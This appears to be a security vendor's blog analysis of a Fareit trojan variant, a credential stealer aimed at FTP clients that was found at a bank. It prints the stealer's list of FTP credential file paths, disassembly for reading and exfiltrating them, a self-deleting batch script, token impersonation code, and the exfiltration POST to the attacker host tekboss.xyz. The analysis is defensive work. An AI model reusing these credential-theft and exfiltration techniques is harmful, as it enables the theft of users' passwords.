Fareit Trojan Analysis and Prevention Secer's Blog - 记录互联网安全历程与个人成长经历

On November 5, 2015, NSFOCUS Threat Analysis Center (TAC) intercepted an unknown virus targeting a bank and then named it Fareit trojan after sample analysis. Attackers could exploit Fareit trojan to compromise the target host by sending spam to trick users into clicking an .exe file, thereby stealing website information and passwords stored on the FTP client.

This document dwells upon the execution process and behaviors of Fareit trojan and provides an end-to-end solution from detection to network protection and terminal protection. The detailed analysis can act as an operational manual for trojan analysis and provides some patterns to facilitate analysis and protection against trojans intended for information stealing.

1 On November 5, NSFOCUS TAC intercepted unknown virus samples and provided protection.
2 On November 6, 55 detection tools were used by VirtusTotal, 12 of which detected the samples to be virus.
3 On November 7, Beijing R&D center, NSFOCUS, presented the sample analysis report.
4 On November 13, NSFOCUS released an in-depth analysis and protection solution.

NSFOCUS Threat Response Center (TRC) is keeping a close eye on the progress of the Fareit trojan attack event. For more information, please contact

NSFOCUS by Sina Weibo at:
http://blog.nsfocus.net/
NSFOCUS Threat Response Center by Sina Weibo at:
http://weibo.com/threatresponse
NSFOCUS by finding:
NSFOCUS at WeChat

文章目录

Fareit Trojan

The sample virus is named Fareit trojan by a majority of vendors. It could be exploited to compromise the target host by sending spam to trick users into clicking an .exe file, thereby stealing website information and passwords stored on the FTP client. Fareit trojan targets information distribution centers, like FTP websites, and sends data to domain names such as http://tekboss.xyz, expecting more mission-critical information.

Recently NSFOCUS has detected multiple traffic packets destined for a malicious IP address, which are similar to this trojan. By using Kingsoft Security Terminal Platform, we discovered that the intercepted virus targeting a bank is a variant of the Fareit information stealer. By the time this report is released, 3071 virus samples have been detected globally, 944 of which is proved to Fareit variants. Fareit trojan is distributed globally, with 59.5% in the U.S and 31% in China.

According to data analysis, Fareit virus has been used to steal information since 2012. At the very beginning, it was only used to download malware, but gradually it has evolved into a tool for stealing data. In May 2013, India’s government affairs website was attacked. In this attack event, Fareit played a role for downloading trojan and stealing information. With the gradual evolution and global expansion of new versions, some variants of Fareit virus have integrated the C&C function, forming a large botnet. The data suggests that one Fareit variant can attack Bitcoin computers to steal Bitcoins and hide in the user’s machine, making it a zombie for hackers. According to the statistics in April 2015, zombies infected with Fareit trojan formed a botnet, which can send 7.7 billion spam every day and spread malware through email messages to steal online bank information and Bitcoin account information.

Sample Information

Potential Impacts of Fareit Trojan

With a great number of variants, Fareit virus often targets valuable information distribution centers or financial product distribution centers.
The sample was intercepted from a bank, which indicates that financial institutions are becoming the attack targets of Fareit trojan.
Hidden and spoofing behaviors and code injection behaviors exist in the sample. Fareit trojan has as many as more than 900 variants and has a trend of evolving into a botnet.

Global Trend of Fareit Trojan Infection

Trojan Analysis

Behavior Analysis

On November 6, the second day after the virus sample was intercepted, antivirus software began to upgrade their virus library and signatures. According to the detection result of VirusTotal shown in Figure 1, 55 detection tools were used, 12 of which determined that the sample was a virus. Behavior analysis involves a lot of details and is briefed as follows:

Figure 1 Sample detection result by VirusTotal

Figure 2 shows the result of monitoring the process of executing the sample.

Figure 2 ProcessMonitor process monitoring

Figure 3 Result of monitoring network behaviors by WireShark

Malicious Behaviors

According to the behavior analysis, the sample could be exploited to compromise the target host by sending spam to trick users into clicking an .exe file, thereby stealing website information and passwords stored on the FTP client.

This virus sample is mainly used for stealing FTP website information and user passwords from the target host.

Attackers could exploit this virus sample to determine whether FTP client software (such as GHISLER, CuteFTP, FlashFXP, FileZilla, or ExpanDrive) is installed on the target host by detecting whether certain files exist. If FTP software is installed, attackers will access the file for saving website information and passwords, read the file memory, search for the websites and passwords, and then upload the website information and passwords to their own server.

This virus can hide itself.

If FTP software is not installed on the target host, the virus sample will create a BAT file under C:\Documents and Settings\Administrator\Local Settings\Temp. This BAT file is used to delete the sample file and BAT file, thereby hiding the virus. The virus sample creates two child processes to perpetrate malicious activities and cheat users by setting the user names of these two child processes to explorer.exe.

Code injection behaviors exist.

The sample creates two child processes of its own name, injects a part of its code and ShellCode into these two child processes, and then starts the child processes, making the child processes execute different behaviors from their parent processes. The behaviors of the two child processes are identical.

Malicious network behaviors exist in the sample execution process.

The virus sample steals the website information and passwords saved on the FTP client and uploads such information to the attacker’s server whose domain name is tekboss.xyz and IP address is 198.105.221.5.

Figure 4 shows the overall sample execution process.

Figure 4 Fareit sample execution process

Execution Process

The following dwells upon the execution process, so that security industry insiders can work out appropriate protection solutions based on the trojan execution characteristics.

File Operations

The virus sample determines whether the FTP software is installed by reading certain files under the installation directory of the FTP client software, such as GHISLER, CuteFTP, FlashFXP, FileZilla, or ExpanDrive.

Take CuteFTP as an example. If the FTP software is installed on the target host, the virus sample will read the sm.dat file, which saves the FTP website information and user passwords. If this file exists, the virus sample will then upload the information to its own server, 198.105.221.5.

The following shows paths to intercept files with the read access by adding breakpoints to the Kernel32.CreateFileW function:

1 C:\Documents and Settings\Administrator\Application Data\GHISLER\wcx_ftp.ini
2 C:\Documents and Settings\Administrator\wcx_ftp.ini
3 C:\WINDOWS\wcx_ftp.ini
4 C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini
5 C:\Documents and Settings\Administrator\Local Settings\Application Data\GHISLER\wcx_ftp.ini 
7 C:\Program Files\Common Files\Ipswitch\WS_FTP\*.*
8 C:\Documents and Settings\Administrator\Application Data\Ipswitch\*.*
9 C:\Documents and Settings\All Users\Application Data\Ipswitch\*.*
10 C:\Documents and Settings\Administrator\Local Settings\Application Data\Ipswitch\*.* 
12 C:\Documents and Settings\Administrator\Application Data\GlobalSCAPE\CuteFTP\sm.dat
13 C:\Documents and Settings\Administrator\Application Data\GlobalSCAPE\CuteFTP\*.*
14 C:\Documents and Settings\Administrator\Application Data\GlobalSCAPE\CuteFTP\9.0\sm.dat
15  C:\Documents and Settings\Administrator\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
16 C:\Documents and Settings\Administrator\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat
17 C:\Documents and Settings\Administrator\Application Data\CuteFTP\sm.dat
18 C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\sm.dat
19 C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
20 C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat
21 C:\Documents and Settings\All Users\Application Data\CuteFTP\sm.dat
22 C:\Documents and Settings\Administrator\Local Settings\Application Data\GlobalSCAPE\CuteFTP\sm.dat
23 C:\Documents and Settings\Administrator\Local Settings\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
24 C:\Documents and Settings\Administrator\Local Settings\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat
25 C:\Documents and Settings\Administrator\Local Settings\Application Data\CuteFTP\sm.dat
26 C:\Program Files\GlobalSCAPE\CuteFTP\sm.dat
27 C:\Program Files\GlobalSCAPE\CuteFTP\Setup\sm.dat
28 C:\Program Files\GlobalSCAPE\CuteFTP\Scripts\sm.dat
29 C:\Program Files\GlobalSCAPE\CuteFTP Pro\sm.dat
30 C:\Program Files\GlobalSCAPE\CuteFTP Lite\sm.dat
31 C:\Program Files\CuteFTP\sm.dat  
33 C:\Documents and Settings\Administrator\Application Data\FlashFXP\3\Sites.dat
34 C:\Documents and Settings\Administrator\Application Data\FlashFXP\4\Sites.dat   
36 C:\Documents and Settings\Administrator\Application Data\FlashFXP\4\History.dat 
38 C:\Documents and Settings\Administrator\Application Data\FileZilla\sitemanager.xml
39 C:\Documents and Settings\Administrator\Local Settings\Application Data\FileZilla\recentservers.xml
41 C:\Documents and Settings\Administrator\Application Data\ExpanDrive\drives.js
43 C:\Documents and Settings\Administrator\Application Data\SharedSettings.ccs
44 C:\Documents and Settings\Administrator\Application Data\SharedSettings.sqlite
45 C:\Documents and Settings\Administrator\Application Data\SharedSettings_1_0_5.ccs
46 C:\Documents and Settings\Administrator\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs  
48 C:\WINDOWS\32BitFtp.in

1 C:\Documents and Settings\Administrator\Application Data\GHISLER\wcx_ftp.ini

2 C:\Documents and Settings\Administrator\wcx_ftp.ini

3 C:\WINDOWS\wcx_ftp.ini

4 C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini

5 C:\Documents and Settings\Administrator\Local Settings\Application Data\GHISLER\wcx_ftp.ini

7 C:\Program Files\Common Files\Ipswitch\WS_FTP\*.*

8 C:\Documents and Settings\Administrator\Application Data\Ipswitch\*.*

9 C:\Documents and Settings\All Users\Application Data\Ipswitch\*.*

10 C:\Documents and Settings\Administrator\Local Settings\Application Data\Ipswitch\*.*

12 C:\Documents and Settings\Administrator\Application Data\GlobalSCAPE\CuteFTP\sm.dat

13 C:\Documents and Settings\Administrator\Application Data\GlobalSCAPE\CuteFTP\*.*

14 C:\Documents and Settings\Administrator\Application Data\GlobalSCAPE\CuteFTP\9.0\sm.dat

15 C:\Documents and Settings\Administrator\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat

16 C:\Documents and Settings\Administrator\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat

17 C:\Documents and Settings\Administrator\Application Data\CuteFTP\sm.dat

18 C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\sm.dat

19 C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat

20 C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat

21 C:\Documents and Settings\All Users\Application Data\CuteFTP\sm.dat

22 C:\Documents and Settings\Administrator\Local Settings\Application Data\GlobalSCAPE\CuteFTP\sm.dat

23 C:\Documents and Settings\Administrator\Local Settings\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat

24 C:\Documents and Settings\Administrator\Local Settings\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat

25 C:\Documents and Settings\Administrator\Local Settings\Application Data\CuteFTP\sm.dat

26 C:\Program Files\GlobalSCAPE\CuteFTP\sm.dat

27 C:\Program Files\GlobalSCAPE\CuteFTP\Setup\sm.dat

28 C:\Program Files\GlobalSCAPE\CuteFTP\Scripts\sm.dat

29 C:\Program Files\GlobalSCAPE\CuteFTP Pro\sm.dat

30 C:\Program Files\GlobalSCAPE\CuteFTP Lite\sm.dat

31 C:\Program Files\CuteFTP\sm.dat

33 C:\Documents and Settings\Administrator\Application Data\FlashFXP\3\Sites.dat

34 C:\Documents and Settings\Administrator\Application Data\FlashFXP\4\Sites.dat

36 C:\Documents and Settings\Administrator\Application Data\FlashFXP\4\History.dat

38 C:\Documents and Settings\Administrator\Application Data\FileZilla\sitemanager.xml

39 C:\Documents and Settings\Administrator\Local Settings\Application Data\FileZilla\recentservers.xml

41 C:\Documents and Settings\Administrator\Application Data\ExpanDrive\drives.js

43 C:\Documents and Settings\Administrator\Application Data\SharedSettings.ccs

44 C:\Documents and Settings\Administrator\Application Data\SharedSettings.sqlite

45 C:\Documents and Settings\Administrator\Application Data\SharedSettings_1_0_5.ccs

46 C:\Documents and Settings\Administrator\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs

48 C:\WINDOWS\32BitFtp.in

If the sm.dat file exists, the virus sample reads the content and saves it to the memory. Then it searches for website information and user passwords in the sm.dat file. The following shows the key code for reading the file content and saves it to the memory.

1 00401F1B  /$  55    push ebp
2 00401F1C  |.  8BEC    mov ebp,esp
3 00401F1E  |.  53    push ebx
4 00401F1F  |.  8B5D 0C   mov ebx,[arg.2]
5 00401F22  |.  6A 10   push 0x10
6 00401F24  |.  53    push ebx
7 00401F25  |.  E8 D9F8FFFF call 123.00401803
8 00401F2A  |.  6A 00   push 0x0       ; /hTemplateFile = NULL
9 00401F2C  |.  6A 00   push 0x0       ; |Attributes = 0
10  00401F2E  |.  6A 03   push 0x3       ; |Mode = OPEN_EXISTING
11  00401F30  |.  6A 00   push 0x0       ; |pSecurity = NULL
12  00401F32  |.  6A 03   push 0x3       
13  ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
14  00401F34  |.  68 00000080 push 0x80000000    
15  ; |Access = GENERIC_READ
16  00401F39  |.  FF75 08   push [arg.1]     
17  ; |FileName = "C:\Program Files\GlobalSCAPE\CuteFTP\sm.dat"  ;
18  00401F3C  |.  E8 45ED0000 call 123.00410C86    ; \CreateFileA
19  00401F41  |.  8903    mov dword ptr ds:[ebx],eax
20  00401F43  |.  40    inc eax
21  00401F44  |.  74 5D   je short 123.00401FA3
22  00401F46  |.  48    dec eax
23  00401F47  |.  6A 00   push 0x0       ; /pFileSizeHigh = NULL
24  00401F49  |.  50    push eax       ; |hFile = NULL
25  00401F4A  |.  E8 8BED0000 call 123.00410CDA    ; \GetFileSize
26  00401F4F  |.  8943 0C   mov dword ptr ds:[ebx+0xC]>
27  00401F52  |.  6A 00   push 0x0       ; /MapName = NULL
28  00401F54  |.  6A 00   push 0x0       ; |MaximumSizeLow = 0x0
29  00401F56  |.  6A 00   push 0x0       ; |MaximumSizeHigh = 0x0
30  00401F58  |.  6A 02   push 0x2       ; |Protection = PAGE_READONLY
31  00401F5A  |.  6A 00   push 0x0       ; |pSecurity = NULL
32  00401F5C  |.  FF33    push dword ptr ds:[ebx]  ; |hFile = NULL
33  00401F5E  |.  E8 7DED0000 call 123.00410CE0    ; \CreateFileMappingA
34  00401F63  |.  23C0    and eax,eax
35  00401F65  |.  74 2F   je short 123.00401F96
36  00401F67  |.  8943 04   mov dword ptr ds:[ebx+0x4]>
37  00401F6A  |.  6A 00   push 0x0       ; /MapSize = 0x0
38  00401F6C  |.  6A 00   push 0x0       ; |OffsetLow = 0x0
39  00401F6E  |.  6A 00   push 0x0       ; |OffsetHigh = 0x0
40  00401F70  |.  6A 04   push 0x4       ; |AccessMode = FILE_MAP_READ
41  00401F72  |.  50    push eax       ; |hMapObject = NULL
42  00401F73  |.  E8 6EED0000 call 123.00410CE6    ; \MapViewOfFile
43  00401F78  |.  8943 08   mov dword ptr ds:[ebx+0x8]>
44  00401F7B  |.  23C0    and eax,eax
45  00401F7D  |.  75 15   jnz short 123.00401F94
46  00401F7F  |.  FF73 04   push dword ptr ds:[ebx+0x4>; /hObject = NULL
47  00401F82  |.  E8 0BED0000 call 123.00410C92    ; \CloseHandle
48  00401F87  |.  FF33    push dword ptr ds:[ebx]  ; /hObject = NULL
49  00401F89  |.  E8 04ED0000 call 123.00410C92    ; \CloseHandle
50  00401F8E  |.  C703 FFFFFFFF mov dword ptr ds:[ebx],-0x>
51  00401F94  |>  EB 0D   jmp short 123.00401FA3
52  00401F96  |>  FF33    push dword ptr ds:[ebx]  ; /hObject = NULL
53  00401F98  |.  E8 F5EC0000 call 123.00410C92    ; \CloseHandle
54  00401F9D  |.  C703 FFFFFFFF mov dword ptr ds:[ebx],-0x>
55  00401FA3  |>  2BC0    sub eax,eax
56  00401FA5  |.  3943 08   cmp dword ptr ds:[ebx+0x8]>
57  00401FA8  |.  0F95C0    setne al
58  00401FAB  |.  5B    pop ebx        ;  0026D848
59  00401FAC  |.  C9    leave
60  00401FAD  \.  C2 0800   retn 0x8

1 00401F1B /$ 55 push ebp

2 00401F1C |. 8BEC mov ebp,esp

3 00401F1E |. 53 push ebx

4 00401F1F |. 8B5D 0C mov ebx,[arg.2]

5 00401F22 |. 6A 10 push 0x10

6 00401F24 |. 53 push ebx

7 00401F25 |. E8 D9F8FFFF call 123.00401803

8 00401F2A |. 6A 00 push 0x0 ; /hTemplateFile = NULL

9 00401F2C |. 6A 00 push 0x0 ; |Attributes = 0

10 00401F2E |. 6A 03 push 0x3 ; |Mode = OPEN_EXISTING

11 00401F30 |. 6A 00 push 0x0 ; |pSecurity = NULL

12 00401F32 |. 6A 03 push 0x3

13 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE

14 00401F34 |. 68 00000080 push 0x80000000

15 ; |Access = GENERIC_READ

16 00401F39 |. FF75 08 push [arg.1]

17 ; |FileName = "C:\Program Files\GlobalSCAPE\CuteFTP\sm.dat" ;

18 00401F3C |. E8 45ED0000 call 123.00410C86 ; \CreateFileA

19 00401F41 |. 8903 mov dword ptr ds:[ebx],eax

20 00401F43 |. 40 inc eax

21 00401F44 |. 74 5D je short 123.00401FA3

22 00401F46 |. 48 dec eax

23 00401F47 |. 6A 00 push 0x0 ; /pFileSizeHigh = NULL

24 00401F49 |. 50 push eax ; |hFile = NULL

25 00401F4A |. E8 8BED0000 call 123.00410CDA ; \GetFileSize

26 00401F4F |. 8943 0C mov dword ptr ds:[ebx+0xC]>

27 00401F52 |. 6A 00 push 0x0 ; /MapName = NULL

28 00401F54 |. 6A 00 push 0x0 ; |MaximumSizeLow = 0x0

29 00401F56 |. 6A 00 push 0x0 ; |MaximumSizeHigh = 0x0

30 00401F58 |. 6A 02 push 0x2 ; |Protection = PAGE_READONLY

31 00401F5A |. 6A 00 push 0x0 ; |pSecurity = NULL

32 00401F5C |. FF33 push dword ptr ds:[ebx] ; |hFile = NULL

33 00401F5E |. E8 7DED0000 call 123.00410CE0 ; \CreateFileMappingA

34 00401F63 |. 23C0 and eax,eax

35 00401F65 |. 74 2F je short 123.00401F96

36 00401F67 |. 8943 04 mov dword ptr ds:[ebx+0x4]>

37 00401F6A |. 6A 00 push 0x0 ; /MapSize = 0x0

38 00401F6C |. 6A 00 push 0x0 ; |OffsetLow = 0x0

39 00401F6E |. 6A 00 push 0x0 ; |OffsetHigh = 0x0

40 00401F70 |. 6A 04 push 0x4 ; |AccessMode = FILE_MAP_READ

41 00401F72 |. 50 push eax ; |hMapObject = NULL

42 00401F73 |. E8 6EED0000 call 123.00410CE6 ; \MapViewOfFile

43 00401F78 |. 8943 08 mov dword ptr ds:[ebx+0x8]>

44 00401F7B |. 23C0 and eax,eax

45 00401F7D |. 75 15 jnz short 123.00401F94

46 00401F7F |. FF73 04 push dword ptr ds:[ebx+0x4>; /hObject = NULL

47 00401F82 |. E8 0BED0000 call 123.00410C92 ; \CloseHandle

48 00401F87 |. FF33 push dword ptr ds:[ebx] ; /hObject = NULL

49 00401F89 |. E8 04ED0000 call 123.00410C92 ; \CloseHandle

50 00401F8E |. C703 FFFFFFFF mov dword ptr ds:[ebx],-0x>

51 00401F94 |> EB 0D jmp short 123.00401FA3

52 00401F96 |> FF33 push dword ptr ds:[ebx] ; /hObject = NULL

53 00401F98 |. E8 F5EC0000 call 123.00410C92 ; \CloseHandle

54 00401F9D |. C703 FFFFFFFF mov dword ptr ds:[ebx],-0x>

55 00401FA3 |> 2BC0 sub eax,eax

56 00401FA5 |. 3943 08 cmp dword ptr ds:[ebx+0x8]>

57 00401FA8 |. 0F95C0 setne al

58 00401FAB |. 5B pop ebx ; 0026D848

59 00401FAC |. C9 leave

60 00401FAD \. C2 0800 retn 0x8

The BAT file is used to delete itself and the sample file.

:ktk 
del  %1  
if     exist   %1   goto  
ktk
del   %0

:ktk

del %1

if exist %1 goto

ktk

del %0

The following shows the code for calling the BAT file (the ShellExecuteA function is called for processing sample files in batches):

1 0012FF48 00410869  /CALL to ShellExecuteA from 123.00410867 
2 0012FF4C 00000000  |hWnd = NULL
3 0012FF50 004140FF  |Operation = "open"
4 0012FF54 0067D8A0  |FileName = "C:\Users\John\AppData\Local\Temp\4719217.bat" ;
5 0012FF58 0067DA30  |Parameters = "  "C:\Users\John\Desktop\123\123.exe" " ;
6 0012FF5C 00000000  |DefDir = NULL
7 0012FF60 00000000  \IsShown = 0x0

1 0012FF48 00410869 /CALL to ShellExecuteA from 123.00410867

2 0012FF4C 00000000 |hWnd = NULL

3 0012FF50 004140FF |Operation = "open"

4 0012FF54 0067D8A0 |FileName = "C:\Users\John\AppData\Local\Temp\4719217.bat" ;

5 0012FF58 0067DA30 |Parameters = " "C:\Users\John\Desktop\123\123.exe" " ;

6 0012FF5C 00000000 |DefDir = NULL

7 0012FF60 00000000 \IsShown = 0x0

Network Operations
The following shows the key code for sending packets.

1 00403BF0  |.  50 push eax
2 00403BF1  |.  68 00000080 push 0x80000000
3 00403BF6  |.  6A 00 push 0x0
4 00403BF8  |.  FF75 08 push [arg.1] ; 
  ASCII "http://tekboss.xyz/ponnie/gate.ph"
5 00403BFB  |.  E8 24D20000 call 123.00410E24  ;  jmp to WININET.InternetCrackUrlA
6 
7 00403752 .  6A 06 push 0x6 ; /Protocol = IPPROTO_TCP
8 00403754 .  6A 01 push 0x1 ; |Type = SOCK_STREAM
9 00403756 .  6A 02 push 0x2 ; |Family = AF_INET
10  00403758 .  E8 09D70000 call 123.00410E66  ; \socket
11  
12  00403712  |.  FF75 08 push [arg.1] ; /pAddr = 002942C0
13  00403715  |.  E8 40D70000 call 123.00410E5A  ; \inet_addr
14  
15  0040371F  |.  FF75 08 push [arg.1] ; /Name = "tekboss.xyz"  ;
16  00403722  |.  E8 39D70000 call 123.00410E60  ; \gethostbyname
17  
18  004037B2 .  50  push eax ; |pSockAddr = 00000290
19  004037B3 .  53  push ebx ; |Socket = 0x0
20  004037B4 .  E8 B3D60000 call 123.00410E6C  ; \connect
21  
22  00403B58  |.  6A 04 push 0x4 ; /DataSize = 0x4
23  00403B5A  |.  8D45 FC lea eax,[local.1]  ; |
24  00403B5D  |.  50  push eax ; |Data = 0012E274
25  00403B5E  |.  68 80000000 push 0x80  ; |Option = SO_LINGER
26  00403B63  |.  68 FFFF0000 push 0xFFFF  ; |Level = SOL_SOCKET
27  00403B68  |.  FF75 08 push [arg.1] ; |Socket = 0x290
28  00403B6B  |.  E8 1AD30000 call 123.00410E8A  ; \setsockopt
29  
30  004037EB  |> /6A 00 /push 0x0  ; /Flags = 0
31  004037ED  |. |FF75 10 |push [arg.3]  ; |DataSize = 148 (328.)
32  004037F0  |. |57  |push edi  ; |Data = 00297320
33  004037F1  |. |FF75 08 |push [arg.1]  ; |Socket = 0x290
34  004037F4  |. |E8 7FD60000 |call 123.00410E78 ; \send

1 00403BF0 |. 50 push eax

2 00403BF1 |. 68 00000080 push 0x80000000

3 00403BF6 |. 6A 00 push 0x0

4 00403BF8 |. FF75 08 push [arg.1] ;

ASCII "http://tekboss.xyz/ponnie/gate.ph"

5 00403BFB |. E8 24D20000 call 123.00410E24 ; jmp to WININET.InternetCrackUrlA

7 00403752 . 6A 06 push 0x6 ; /Protocol = IPPROTO_TCP

8 00403754 . 6A 01 push 0x1 ; |Type = SOCK_STREAM

9 00403756 . 6A 02 push 0x2 ; |Family = AF_INET

10 00403758 . E8 09D70000 call 123.00410E66 ; \socket

12 00403712 |. FF75 08 push [arg.1] ; /pAddr = 002942C0

13 00403715 |. E8 40D70000 call 123.00410E5A ; \inet_addr

15 0040371F |. FF75 08 push [arg.1] ; /Name = "tekboss.xyz" ;

16 00403722 |. E8 39D70000 call 123.00410E60 ; \gethostbyname

18 004037B2 . 50 push eax ; |pSockAddr = 00000290

19 004037B3 . 53 push ebx ; |Socket = 0x0

20 004037B4 . E8 B3D60000 call 123.00410E6C ; \connect

22 00403B58 |. 6A 04 push 0x4 ; /DataSize = 0x4

23 00403B5A |. 8D45 FC lea eax,[local.1] ; |

24 00403B5D |. 50 push eax ; |Data = 0012E274

25 00403B5E |. 68 80000000 push 0x80 ; |Option = SO_LINGER

26 00403B63 |. 68 FFFF0000 push 0xFFFF ; |Level = SOL_SOCKET

27 00403B68 |. FF75 08 push [arg.1] ; |Socket = 0x290

28 00403B6B |. E8 1AD30000 call 123.00410E8A ; \setsockopt

30 004037EB |> /6A 00 /push 0x0 ; /Flags = 0

31 004037ED |. |FF75 10 |push [arg.3] ; |DataSize = 148 (328.)

32 004037F0 |. |57 |push edi ; |Data = 00297320

33 004037F1 |. |FF75 08 |push [arg.1] ; |Socket = 0x290

34 004037F4 |. |E8 7FD60000 |call 123.00410E78 ; \send

Packet information:

POST /ponnie/gate HTTP/1.0
Host: tekboss.xyz
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 2461
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)

POST /ponnie/gate HTTP/1.0

Host: tekboss.xyz

Accept: */*

Accept-Encoding: identity, *;q=0

Accept-Language: en-US

Content-Length: 2461

Content-Type: application/octet-stream

Connection: close

Content-Encoding: binary

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)

Process Operations

The Fareit sample uses CreateToolhelp32Snapshot, Process32First, and Process32Next functions to locate the explorer.exe process, uses OpenProcessToken to obtain the process token, uses ImpersonateLoggedOnUser to have the current process imitate the explorer.exe process, and then uses “administrator” as the login name of the current process.

1   //Use CreateToolhelp32Snapshot to obtain the process snapshot
2   00402C55   .  6A 00         push 0x0                                 ; /ProcessID = 0x0
3   00402C57   .  6A 02         push 0x2                                 
4   ; |Flags = TH32CS_SNAPPROCESS
5   00402C59   .  E8 CAE00000   call 123.00410D28                        ; \CreateToolhelp32Snapshot
6   
7   //explorer.exe
8   00402C73   .  50            push eax                                 ; /lppe
9   00402C74   .  FFB5 C8FEFFFF push dword ptr ss:[ebp-0x138]            ; |hSnapshot = NULL
10      00402C7A   .  E8 AFE00000   call 123.00410D2E                     ; \Process32First
11      00402C7F   >  23C0          and eax,eax
12      00402C81   .  0F84 03010000 je 123.00402D8A
13      00402C87   .  68 E2454100   push 123.004145E2                        ; /Pattern = "explorer.exe"
14      00402C8C   .  8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-0x110]         ; |
15      00402C92   .  50            push eax                                 ; |String = "€|?_"
16      00402C93   .  E8 98E10000   call 123.00410E30                        ; \StrStrIA
17      00402C98   .  23C0          and eax,eax
18      00402C9A   .  0F84 D3000000 je 123.00402D73
19      00402CA0   .  C785 C4FEFFFF>mov dword ptr ss:[ebp-0x13C],0x0
20      00402CAA   .  8D85 C4FEFFFF lea eax,dword ptr ss:[ebp-0x13C]
21      00402CB0   .  50            push eax
22      00402CB1   .  FFB5 D4FEFFFF push dword ptr ss:[ebp-0x12C]
23      00402CB7   .  FF15 B7434100 call dword ptr ds:[0x4143B7]             ;  KERNEL32.ProcessIdToSessionId
24      00402CBD   .  8B95 C4FEFFFF mov edx,dword ptr ss:[ebp-0x13C]
25      00402CC3   .  23C0          and eax,eax
26      00402CC5   .  0F84 A8000000 je 123.00402D73
27      00402CCB   .  3B55 F4       cmp edx,dword ptr ss:[ebp-0xC]
28      00402CCE   .  0F85 9F000000 jnz 123.00402D73
29      00402CD4   .  FFB5 D4FEFFFF push dword ptr ss:[ebp-0x12C]            ; /ProcessId = 0x0
30      00402CDA   .  6A 00         push 0x0                                 ; |Inheritable = FALSE
31      00402CDC   .  68 00000002   push 0x2000000                           ; |Access = 2000000
32      00402CE1   .  E8 4EE00000   call 123.00410D34                        ; \OpenProcess
33      00402CE6   .  23C0          and eax,eax
34      00402CE8   .  0F84 85000000 je 123.00402D73
35      00402CEE   .  8945 F8       mov dword ptr ss:[ebp-0x8],eax
36      00402CF1   .  8D45 FC       lea eax,dword ptr ss:[ebp-0x4]
37      00402CF4   .  50            push eax                                 ; /phToken = 0012FD84
38      00402CF5   .  68 EB010200   push 0x201EB                             ; |DesiredAccess = STANDARD_RIGHTS_READ|TOKEN_ASSIGN_PRIMARY|TOKEN_DUPLICATE|TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES|TOKEN_ADJUST_GROUPS|TOKEN_ADJUST_DEFAULT|100
39      00402CFA   .  FF75 F8       push dword ptr ss:[ebp-0x8]              ; |hProcess = 7C839AB0
40      00402CFD   .  FF15 EF434100 call dword ptr ds:[0x4143EF]          ; \OpenProcessToken
41      00402D03   .  23C0          and eax,eax
42      00402D05   .  74 64         je short 123.00402D6B
43      00402D07   .  FF75 FC       push dword ptr ss:[ebp-0x4]              ;  KERNEL32.7C813E70
44      00402D0A   .  FF15 F3434100 call dword ptr ds:[0x4143F3]             ;  ADVAPI32.ImpersonateLoggedOnUser
45      00402D10   .  23C0          and eax,eax
46      00402D12   .  74 45         je short 123.00402D59
47      00402D14   .  43            inc ebx
48      00402D15   .  C785 C0FEFFFF>mov dword ptr ss:[ebp-0x140],0x0
49      00402D1F   .  8D85 C0FEFFFF lea eax,dword ptr ss:[ebp-0x140]
50      00402D25   .  50            push eax
51      00402D26   .  68 3F000F00   push 0xF003F
52      00402D2B   .  E8 E2E00000   call 123.00410E12    ;  jmp to ADVAPI32.RegOpenCurrentUser
53      00402D30   .  0BC0          or eax,eax
54      00402D32   .  75 15         jnz short 123.00402D49
55      00402D34   .  83BD C0FEFFFF>cmp dword ptr ss:[ebp-0x140],0x0
56      00402D3B   .  74 0C         je short 123.00402D49
57      00402D3D   .  FFB5 C0FEFFFF push dword ptr ss:[ebp-0x140]
58      00402D43   .  8F05 E0404100 pop dword ptr ds:[0x4140E0]              ;  123.00403E7B
59      00402D49   >  8B45 08       mov eax,dword ptr ss:[ebp+0x8]
60      00402D4C   .  23C0          and eax,eax
61      00402D4E   .  74 05         je short 123.00402D55
62      00402D50   .  FF75 FC       push dword ptr ss:[ebp-0x4]              ;  KERNEL32.7C813E70
63      00402D53   .  8F00          pop dword ptr ds:[eax]                   ;  123.00403E7B
64      00402D55   >  EB 33         jmp short 123.00402D8A
65      00402D57   .  EB 10         jmp short 123.00402D69
66      00402D59   >  FF75 FC       push dword ptr ss:[ebp-0x4]              ; /hObject = 7C813E70
67      00402D5C   .  E8 31DF0000   call 123.00410C92                        ; \CloseHandle
68      00402D61   .  FF75 F8       push dword ptr ss:[ebp-0x8]              ; /hObject = 7C839AB0
69      00402D64   .  E8 29DF0000   call 123.00410C92                        ; \CloseHandle
70      00402D69   >  EB 08         jmp short 123.00402D73
71      00402D6B   >  FF75 F8       push dword ptr ss:[ebp-0x8]              ; /hObject = 7C839AB0
